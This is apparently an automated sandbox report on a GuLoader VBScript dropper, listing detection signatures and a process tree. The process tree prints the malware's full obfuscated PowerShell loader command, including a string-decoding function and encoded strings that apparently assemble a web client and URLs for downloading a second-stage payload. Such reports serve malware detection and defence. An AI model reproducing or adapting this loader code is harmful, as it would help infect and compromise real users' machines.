Windows
Analysis Report
Blikvarefabrikken.vbs
Overview
General Information
Detection
GuLoader
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7084 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Blikv arefabrikk en.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) cmd.exe (PID: 2612 cmdline:
"C:\Window s\System32 \cmd.exe" /c ping 12 7.0.0.1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 6220 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) PING.EXE (PID: 6524 cmdline:
ping 127.0 .0.1 MD5: 2F46799D79D22AC72C241EC0322B011D) powershell.exe (PID: 6560 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "Get-Servi ce;$Philol oger='func ';Get-Hist ory;$Philo loger+='t' ;Get-Histo ry;$Philol oger+='i'; $Stttevven es=Get-His tory;$Phil ologer+='o n:';$Sttte vvenes=Get -History;( ni -p $Phi lologer -n Emissions kursers -v alue { par am($Flavou rfully);$M odstilling ens=6;do { $Metallogr aphically+ =$Flavourf ully[$Mods tillingens ];$Modstil lingens+=7 } until(!$ Flavourful ly[$Modsti llingens]) $Metallogr aphically} );(ni -p $ Philologer -n Meyers -value {p aram($Gest ikulerende );.($Hjlpe lsestes) ( $Gestikule rende)});C onvertTo-H tml;$Unlab oring=Emis sionskurse rs 'Maaned NWro,gieRa pturtUst l a.EmbersW' ;$Unlabori ng+=Emissi onskursers ' Ghe tEH hvsysbMods tacSlightL Rykke IS.l vove Trans nUvir,eT'; $Splser=Em issionskur sers 'reva liMRappego HeliorzHo, fbeiregteu lSedestlOv erasaPred. c/';$Tilbi ndes=Emiss ionskurser s 'FrenesT A arthlEcu adosReg,on 1 Holly2'; $Xenon='Sa hari[Zigge ,N andepeb ruu sTUnpr iv.Ceylons Dealmaesig nifrdisemb VAfmaaliaf sondCHeuve lekomm.npP alladoUdsk ivISprednn Fairl tFor sulMAkkord aDe imaNMo biliALb.in ggOverheej e aldRKern e.]Myster: Sikk r:Sve jtsSEnfeeb e ilsacPos tkauErythr rD.zzieIHe lmedTTwank mYInvtunpR e.ksaR Non inOSubgovt nmesmOT l dvsCEpider oS.xtanL T phst=Endow m$ ec estT ot enI Ani soLInsultB rugeriB a ujoN Afhen D Ej ndEKa ra ts';$Sp lser+=Emis sionskurse rs 'lainer 5Lystba.Tr .mas0Centr a Polyba(A bysmtW Sma rti stivnS kur.adAfho ppoHus arw TufstesTnd s i .ootda NKldedrTMe roga Chelo n1F reca0D iammi.Forb ru0Kurede; Transp Pro speW Buskp iTryksanDr oum.6Indfl e4Bag,li;G lycer Susc .px ingm6 G ran4Sh y si;Succul SamfunrPre spavNazifi :Se isa1Me llem3Jarbo t4Inter .I dioch0 ype rf) Voter In arbGAkk ompeHitheo c unsankPo rtlioTsked e/Grimac2B idd t0coll ar1wor.le0 Ov rbr0Mac ken1Murder 0Eccles1Mo lli .parla FbandaiiSc andirSimul teUnwilffS pringo Spa nkxDendri/ Larees1Ove ,be3Auricu 4Subaci.Se izu,0';$Ga rcon72=Emi ssionskurs ers 'Circu mU eceles likkeT,ens tRKabe l-U nconfABekr anGK.ssere pipefinCha pout';$aut ogiro=Emis sionskurse rs ' Pro,t h Vir etAr vef tOvers tpNabobisO rdina:bene fi/ Objec/ Afta.kOme gnsa Mi te rSprjteu o repon Pret iaFu ktivM orbi.rAfta lei Enco.k Much osHem atohCarava aEkspon. C on uo Chec krMetallgG arder/Quil k i One.em Mu tiaHel vetgReagic eApo.tasSt orag/Ste n fiCorpornA ftrapnBe o yao afvrgc J dingeuml autnBourg c .esube N onde.Marsk amArts,lsR aglanopias sa>Sortieh Sublimt Pl eurt Tinc p mpede:Le vned/Bescr a/D wnloaC hola.lMaal eshFotosta BlotttlNep hroaBaglok lUnciv,a u lils Atten iOccamia H elbr.Sonat eo FrimrrP la.ssgUnmo ra/ Denias EndrgeFle wspaFattil rOu,voicAf tenshMerge /Mi iciiW alisen Mas hrnUnfrozo